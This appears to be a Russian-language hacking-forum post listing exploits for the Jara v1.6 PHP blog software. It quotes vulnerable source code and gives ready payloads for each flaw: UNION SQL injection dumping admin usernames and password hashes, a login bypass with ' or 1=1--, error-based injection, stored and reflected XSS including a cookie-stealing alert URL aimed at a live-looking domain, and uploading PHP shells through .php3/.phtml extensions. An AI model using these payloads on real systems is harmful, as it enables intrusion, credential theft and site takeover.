Jara v1.6 - 1st March 2010 http://jara.xantiz.com/download.html category.php PHP: @$categoryid = $_REQUEST["id"]; $category = jara_get_category($categoryid); jara_page_start("Category: ".$category["title"]); $query = "select * from jara_posts where categoryid = '$categoryid'"; SQL mq=off http://localhost/jarav16/category.php?id=-1'+union+select+1,version(),3+--+ ---------------------- view.php PHP: session_start(); $id = $_REQUEST["id"]; if(isset($_POST["name"])) { $name = $_POST["name"]; $website = $_POST["website"]; $comment = $_POST["comment"]; if(substr($website, 0, 4) != "http") { $website = "javascript:;"; } $name = htmlspecialchars($name); $comment = strip_tags($comment); if(!get_magic_quotes_gpc()) { $name = addslashes($name); $website = addslashes($website); $comment = addslashes($comment); } if(strlen($name) > 64) { $name = substr($name, 0, 60) . "..."; } if(!empty($name) && !empty($comment) && $_POST["security"] == $_SESSION["result"]) { @jara_db_query("insert into jara_comments values('0', '$id', '$name', '$website', '$comment', '".time()."')"); $id не фильтруется, при mq=off, можно провести SQL injection + acttive XSS. Из-за капчи удобнее использовать FireFox + Tamper Data http://localhost/jarav16/view.php?id=1 заполняем Your Name: Your Comment: Security Question: и в Tamper Data правим id id=1','Guest','','Hi!<script>alert(121212);</script>',1270547738) -- 1 По адресу http://localhost/jarav16/view.php?id=1 имеем alert. ---------------------- page.php PHP: $id = $_REQUEST["id"]; $result = jara_db_query("select * from jara_pages where id = '$id' limit 1"); SQL mq=off http://localhost/jarav16/page.php?id=1'+union+select+1,username,unhex(hex(password)),4+from+jara_users+--+ Хеш хранится в формате SHA1 ---------------------- В админке: admin/upload.php PHP: if(is_writable("./../uploads/")) { if($_FILES["userfile"]["size"] > 0) { $ext = strtolower(end(explode(".", basename($_FILES["userfile"]["name"])))); if($ext == "php" || $ext == "pl" || $ext == "exe" || $ext == "sh") { echo "<p>You're trying to upload an extension that's not allowed. Please upload it inside a container such as a compressed archive.</p>"; } else { if($_FILES["userfile"]["error"] == 0) { $filename = $_SESSION["jara_admin"] . "-" . strtolower(preg_replace("/[^a-zA-Z0-9]/", "-", basename($_FILES["userfile"]["name"]))) . "-" . time() . "." . strtolower(end(explode(".", basename($_FILES["userfile"]["name"])))); if(move_uploaded_file($_FILES["userfile"]["tmp_name"], "./../uploads/$filename")) { echo "<p><strong>Your file was uploaded to <a href=\"../uploads/$filename\">$filename</a> in the uploads directory.</strong></p>"; Shell загружаются файлы с расширением .php3, .phtml ----------------------
Jara v1.6 - 1st March 2010 XSS /search.php PHP: ...try { jara_page_start("Search results"); $term = $_REQUEST["term"]; if(!get_magic_quotes_gpc()) { $term = addslashes($term);... PHP: ... echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";... HTML: ...<form action="search.php" method="post"> <p> Search term: <input type="text" name="term" id="term" /><input type="submit" value="Go" /> </p> </form>... Результат: в поле term - xss
SQL inj - Класика жанра! Входим в админку Jara v1.6 /login.php PHP: require_once("include/jara_fns.php"); if(isset($_POST["login_action"])) { try { session_start(); $username = $_POST["username"]; $password = $_POST["password"]; if(!get_magic_quotes_gpc()) { $username = addslashes($username); $password = addslashes($password); } $result = jara_user_authenticate($_POST["username"], $_POST["password"]); if($result == false) { jara_page_start("Login failure"); echo "<p>\n"; echo "\tYou have entered an invalid username or password.<br />\n"; echo "\tPlease go back and try again.\n"; echo "</p>"; jara_page_end(); exit; } else { header("Location: index.php"); } } catch(JaraDatabaseException $ex) { jara_page_start("Login failure");... В функцию jara_user_authenticate вставляються $_POST["username"] и $_POST["password"]. Эта конструкция отдыхает: PHP: ...$username = $_POST["username"]; $password = $_POST["password"]; if(!get_magic_quotes_gpc()) { $username = addslashes($username); $password = addslashes($password); }... /include/auth_fns.php PHP: ...function jara_user_authenticate($username, $password) { $query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1"; $result = jara_db_query($query); if($result->num_rows == 0) { return false; } else { $row = $result->fetch_assoc(); $_SESSION["jara_admin"] = $username; $_SESSION["jara_permissions"] = array($row["permission_posts"], $row["permission_pages"], $row["permission_users"], $row["permission_upload"]); return true; } }... Условие: mg=off Результат: <input type="text" id="username" name="username" width="20" /> в поле username ' or 1=1--[ ]
SQL inj Jara v1.6 /admin/delete_category.php PHP: ...try { $id = $_REQUEST["id"]; if($id == 1) { throw new JaraGeneralException("You cannot the delete the Uncategorized category."); } $query = "delete from jara_categories where categoryid = '$id'"; $result = jara_db_query($query);... /include/db_fns.php PHP: ...function jara_db_connect() { global $jconfig, $db_conn; if($db_conn == null) { @$conn = new mysqli($jconfig->mysql_host, $jconfig->mysql_username, $jconfig->mysql_password, $jconfig->mysql_db); if(mysqli_connect_errno()) { throw new JaraDatabaseException(1, mysqli_connect_errno(), mysqli_connect_error()); } $db_conn = $conn; return $conn; } else { return $db_conn; } } function jara_db_query($query) { $conn = jara_db_connect(); $result = $conn->query($query); if($conn->errno) { throw new JaraDatabaseException(2, $conn->errno, $conn->error, $query); } if(substr($query, 0, 6) == "select" || substr($query, 0, 4) == "show" || substr($query, 0, 7) == "explain") { return $result; } else { return $conn->affected_rows; } } Условие: mg=off Результат: http://localhost/jarav/admin/delete_category.php?id=1[sql] http://localhost/jarav/admin/delete_category.php?id=1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--+ Также уязвимы другие скрипты!
http://xantiz.co.cc/blog/view.php?id=8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22 Если есть mq то можно и так
